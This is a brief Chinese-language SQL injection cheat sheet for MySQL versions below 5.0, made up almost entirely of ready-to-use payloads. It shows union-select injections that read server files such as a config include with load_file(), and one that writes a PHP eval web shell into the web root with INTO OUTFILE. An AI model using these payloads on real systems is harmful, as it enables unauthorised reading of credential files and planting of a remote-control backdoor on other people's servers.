mysql <5.0

读文件：load_file()

sql-shell select load_file('');

d:/www/xx/index.php

/home/webroot/...../index.php

and 1=2 union select 1,load_file('c:\\..\\sql_inc.php'),3,4.......;

查看源代码

写文件：into outfile

and 1=2 union select 1,"<?php @eval($_post['cmd']);?>",3,4 into outfile('c:/Inetpub/wwwroot/xxxxx/test.php')